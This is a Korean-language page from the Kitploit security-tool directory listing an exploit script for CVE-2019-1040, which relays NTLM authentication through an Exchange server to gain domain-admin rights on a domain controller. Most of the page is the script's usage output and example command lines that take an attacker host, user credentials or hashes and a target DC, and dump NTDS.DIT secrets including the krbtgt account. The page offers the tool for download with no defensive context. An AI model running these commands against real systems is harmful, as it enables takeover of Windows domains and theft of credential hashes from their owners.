Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-1040 — Exchange와 함께하는 CVE-2019-1040 | Kitploit
도구/GitHubGitHub/ridter/cve-2019-1040
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPenetration Testing
GitHubridter/cve-2019-1040

CVE-2019-1040

Exchange와 함께하는 CVE-2019-1040

저장소 보기
250585년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-1040

훌륭한 글입니다! CVE-2019-1040 악용 - 릴레이 취약점을 결합한 RCE 및 도메인 관리자 권한 획득 .

그래서, 저는 쉽게 사용할 수 있도록 CVE-2019-1040.py를 작성했습니다.

또한 제 exchange2domain 저장소를 확인해보세요: https://github.com/ridter/exchange2domain, Exchange를 사용하여 DC를 획득하는 또 다른 방법입니다.

요구사항

이 도구는 impacket이 필요합니다. pip를 사용하여 pip install impacket으로 설치할 수 있습니다.

사용법

root@kitploit:~
usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                        [--hashes HASHES] [--smb-port [destination port]] -ah
                        ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
                        [-t TIMEOUT]
                        [--exec-method [{smbexec,wmiexec,mmcexec}]]
                        [--just-dc-user USERNAME] [--debug]
                        EX_HOSTNAME

CVE-2019-1040 with Exchange

positional arguments:
  EX_HOSTNAME           Exchange 서버의 호스트명/IP

optional arguments:
  -h, --help            이 도움말 메시지를 표시하고 종료
  -u USERNAME, --user USERNAME
                        인증에 사용할 사용자 이름
  -d DOMAIN, --domain DOMAIN
                        사용자가 속한 도메인 (FQDN 또는 NETBIOS 도메인 이름)
  -p PASSWORD, --password PASSWORD
                        인증용 비밀번호, 지정하지 않고 NT:NTLM 해시가 제공되지 않으면
                        입력 프롬프트가 표시됨
  --hashes HASHES       LM:NLTM 해시
  --smb-port [destination port]
                        SMB 서버에 연결할 대상 포트
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        공격자 호스트명 또는 IP
  -th TARGET_HOST, --target-host TARGET_HOST
                        DC의 호스트명 또는 IP
  -t TIMEOUT, --timeout TIMEOUT
                        시간 제한(초)
  --exec-method [{smbexec,wmiexec,mmcexec}]
                        대상에서 사용할 원격 실행 방법 (--use-vss 사용 시에만). 기본값: smbexec
  --just-dc-user USERNAME
                        지정된 사용자의 NTDS.DIT 데이터만 추출. DRSUAPI 접근 방식에서만 사용 가능.
  --debug               디버그 출력 활성화

예시:

root@kitploit:~
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip 
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip 

krbtgt만 덤프하려면 --just-dc-user를 사용하세요.

예시:

root@kitploit:~
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip  --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt

도구 다운로드